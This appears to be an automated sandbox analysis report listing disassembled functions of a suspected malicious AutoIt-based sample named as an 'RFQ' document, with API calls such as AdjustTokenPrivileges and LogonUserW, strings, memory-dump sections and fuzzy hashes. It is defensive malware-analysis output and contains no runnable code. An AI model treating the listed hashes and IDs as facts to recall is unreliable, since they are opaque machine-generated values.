Instruction Fuzzy Hash: 411152726106049FDB10EF29D88592AF7E5EF85325F00C52EF9A5D7391DB34AC05CB85

Function 0046A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A0A9

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: aedf4ef7b819e7061a1d9f91078b4e07f1c96d427ff214e73d92c0d6c6dea44e
Instruction ID: 2c9db32d3ae4548df1de74cdb7d607b6943671b75e71bd67b23ca617ca970478
Opcode Fuzzy Hash: aedf4ef7b819e7061a1d9f91078b4e07f1c96d427ff214e73d92c0d6c6dea44e
Instruction Fuzzy Hash: D8F0823550522DABDB21AFA4CC48FEE776CBF08361F00416AF909E6191DA349954CBA6

Function 004581CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: eb7ac69ade783395277c4643d4176b5893d02204cea2e8a5f246f56db08c2cc2
Instruction ID: 9bafbd08ffd8acbbb2d026fb6ea58a2c51283803ccb0941fee12b6a17b14d6d6
Opcode Fuzzy Hash: eb7ac69ade783395277c4643d4176b5893d02204cea2e8a5f246f56db08c2cc2
Instruction Fuzzy Hash: 13E04632000620AEE7212B61FC08D777BEAEB04314720882EB8A680431CF22AC90DB18

Function 0042A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,00494178,00428D57,00493E50,?,?,00000001), ref: 0042A15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0042A163

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
Instruction ID: 9da78fce3b57c7d2137df8720d13279edd616241823e717daaa40eb201d223bb
Opcode Fuzzy Hash: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
Instruction Fuzzy Hash: CCB09231254308ABCA022B91EC09B8C3F68EB46AA2F404434FA0D84C60CB6254548B99

Function 0042F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
Instruction ID: 9dbe1c865c2330f56ffee62ed517aae1867acb93b770053fb6672ec4a27fddfc
Opcode Fuzzy Hash: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
Instruction Fuzzy Hash: 08322861E29F114DD7239634D832336A258AFB73C8F95D737F819B5AA5EB28D4C34208

Function 0043242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
Instruction ID: 6c6381ca5121d9a8a5ca5470a2620081c1b3ce1be078dbaf297b8ac86cff2730
Opcode Fuzzy Hash: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
Instruction Fuzzy Hash: E2B10130E2AF414DD72396398935336BA5CAFBB2C5F51D72BFC2670D22EB2185934185

Function 00464C53 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00464C76

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: ee9df15493a40b048f6a63b66618f3ae232bfa5e5e2bfa15106318706817909b
Instruction ID: b34e2a9394489d035c963e7dd8f40c9807a13273b0ab6c7f74163ad9f46ae88e
Opcode Fuzzy Hash: ee9df15493a40b048f6a63b66618f3ae232bfa5e5e2bfa15106318706817909b
Instruction Fuzzy Hash: BED05EA032220838ECA807209D5FF7F1109E3C0B81F96854B7241853C1F8DC6801A03F

Function 004587B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00458389), ref: 004587D1

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
Instruction ID: bbaf709efb0beb88cdfa5f1a33ae6004459e2c5163e494cc38a8a30eb56211a1
Opcode Fuzzy Hash: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
Instruction Fuzzy Hash: 49D05E3226050EAFEF018EA4DC01EAE3B69EB04B01F408521FE15D50A1C775E835AB60

Function 0042A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0042A12A

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
Instruction ID: 5f0b767449e3d37fa0a9cb76ca1a1966b2bcebad2f74a673b8e7725f9ca30b43
Opcode Fuzzy Hash: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
Instruction Fuzzy Hash: E2A0113000020CAB8A022B82EC08888BFACEA022A0B008030F80C808228B32A8208A88

Function 00418808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc918cabfbc13eeeaccb278bb908b555cf4655f640fadc8373e86b06f087c2cb
Instruction ID: d3e05baf70842595a15b67714876080b4d37379fdc1224c105ba09137936e944
Opcode Fuzzy Hash: bc918cabfbc13eeeaccb278bb908b555cf4655f640fadc8373e86b06f087c2cb
Instruction Fuzzy Hash: 44223730904506CBDF288A68C4A47BEB7A1BF41345F28816FDD468B693DB7C9CD6C74A

Function 004221C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 35e5cfd0643d00128ec34ecd890c43f992cb4d917009b55117061340238bc551
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 18C1D83230507349DF2D4639953403FFAA15EA27B139A076FD8B3CB2D4EE18D965D624

Function 004225FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 4494295b5c4546222a84ad3f443fcd2c01bced2acdb834a923f1c328fe2fc13d
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: CAC1D4333090B34ADF2D4639953403FBAA15EA27B139B036FD4B2DB2D4EE18D925D624

Function 00576594 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
Instruction ID: 37ec46b48614913021248eff56da5b361e939c746b2c312ceacc90cb3b6ed53b
Opcode Fuzzy Hash: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
Instruction Fuzzy Hash: C6311632905F845ECF338E28B814AB57F64BB62774FDDC16AE44C8B19AD221DC44F661

Function 00477806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0047785B
DeleteObject.GDI32(00000000), ref: 0047786D
DestroyWindow.USER32 ref: 0047787B
GetDesktopWindow.USER32 ref: 00477895
GetWindowRect.USER32(00000000), ref: 0047789C
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 004779DD
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 004779ED
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477A35
GetClientRect.USER32(00000000,?), ref: 00477A41
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00477A7B
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477A9D
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477AB0
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477ABB
GlobalLock.KERNEL32(00000000), ref: 00477AC4
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477AD3
GlobalUnlock.KERNEL32(00000000), ref: 00477ADC
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477AE3
GlobalFree.KERNEL32(00000000), ref: 00477AEE
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477B00
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00492CAC,00000000), ref: 00477B16
GlobalFree.KERNEL32(00000000), ref: 00477B26
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00477B4C
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00477B6B
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477B8D
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477D7A

Strings

static, xrefs: 00477A75, 00477BCC
DISPLAY, xrefs: 00477BDD
, xrefs: 00477D00
AutoIt v3, xrefs: 00477A2D

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: cbe7ba0df42561e6311dda8264485de7e40118ff6f13b361737e76822355802e
Instruction ID: 98d8c47751f1291c48596143d1a8e41d269c6aae9b6b01708d63eada7aa7ec2c
Opcode Fuzzy Hash: cbe7ba0df42561e6311dda8264485de7e40118ff6f13b361737e76822355802e
Instruction Fuzzy Hash: DE027A71900105EFDB14DFA4DC89EAE7BB9FF49310F10856AF905AB2A1C738AD41CB68

Function 0048356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,0048F910), ref: 00483627
IsWindowVisible.USER32(?), ref: 0048364B

Strings

EDITPASTE, xrefs: 0048395F
ISCHECKED, xrefs: 00483839
CURRENTTAB, xrefs: 004836BD
TABRIGHT, xrefs: 0048369D
HIDEDROPDOWN, xrefs: 00483700
UNCHECK, xrefs: 00483883
ISENABLED, xrefs: 0048366B
SETCURRENTSELECTION, xrefs: 004837B6
GETCURRENTSELECTION, xrefs: 004837E3
GETSELECTED, xrefs: 004838A3
GETCURRENTCOL, xrefs: 00483928
ADDSTRING, xrefs: 00483716
SHOWDROPDOWN, xrefs: 004836E0
CHECK, xrefs: 0048386D
GETCURRENTLINE, xrefs: 004838ED
SENDCOMMANDID, xrefs: 004839DA
TABLEFT, xrefs: 00483687
GETLINECOUNT, xrefs: 004838C6
ISVISIBLE, xrefs: 00483637
FINDSTRING, xrefs: 00483776
DELSTRING, xrefs: 00483749
GETLINE, xrefs: 0048399B
SELECTSTRING, xrefs: 00483806

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: df18ccac80ca4098b50a46d9e4b82a0c4588cfc9e14ecf85f4615084e1af2d64
Instruction ID: 9f5fdaa8788cae778637d634d7abea83d78ef325d3b9343814b8d9d38e530adb
Opcode Fuzzy Hash: df18ccac80ca4098b50a46d9e4b82a0c4588cfc9e14ecf85f4615084e1af2d64
Instruction Fuzzy Hash: 28D19E702042009BCA04FF11C451A6E77E5AF55759F54886EF8826B3A3DB3DEE0ACB5A

Function 0048A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0048A630
GetSysColorBrush.USER32(0000000F), ref: 0048A661
GetSysColor.USER32(0000000F), ref: 0048A66D
SetBkColor.GDI32(?,000000FF), ref: 0048A687
SelectObject.GDI32(?,00000000), ref: 0048A696
InflateRect.USER32(?,000000FF,000000FF), ref: 0048A6C1
GetSysColor.USER32(00000010), ref: 0048A6C9
CreateSolidBrush.GDI32(00000000), ref: 0048A6D0
FrameRect.USER32(?,?,00000000), ref: 0048A6DF
DeleteObject.GDI32(00000000), ref: 0048A6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 0048A731
FillRect.USER32(?,?,00000000), ref: 0048A763
GetWindowLongW.USER32(?,000000F0), ref: 0048A78E

Part of subcall function 0048A8CA: GetSysColor.USER32(00000012), ref: 0048A903
Part of subcall function 0048A8CA: SetTextColor.GDI32(?,?), ref: 0048A907
Part of subcall function 0048A8CA: GetSysColorBrush.USER32(0000000F), ref: 0048A91D
Part of subcall function 0048A8CA: GetSysColor.USER32(0000000F), ref: 0048A928
Part of subcall function 0048A8CA: GetSysColor.USER32(00000011), ref: 0048A945
Part of subcall function 0048A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
Part of subcall function 0048A8CA: SelectObject.GDI32(?,00000000), ref: 0048A964
Part of subcall function 0048A8CA: SetBkColor.GDI32(?,00000000), ref: 0048A96D
Part of subcall function 0048A8CA: SelectObject.GDI32(?,?), ref: 0048A97A
Part of subcall function 0048A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
Part of subcall function 0048A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
Part of subcall function 0048A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
Part of subcall function 0048A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
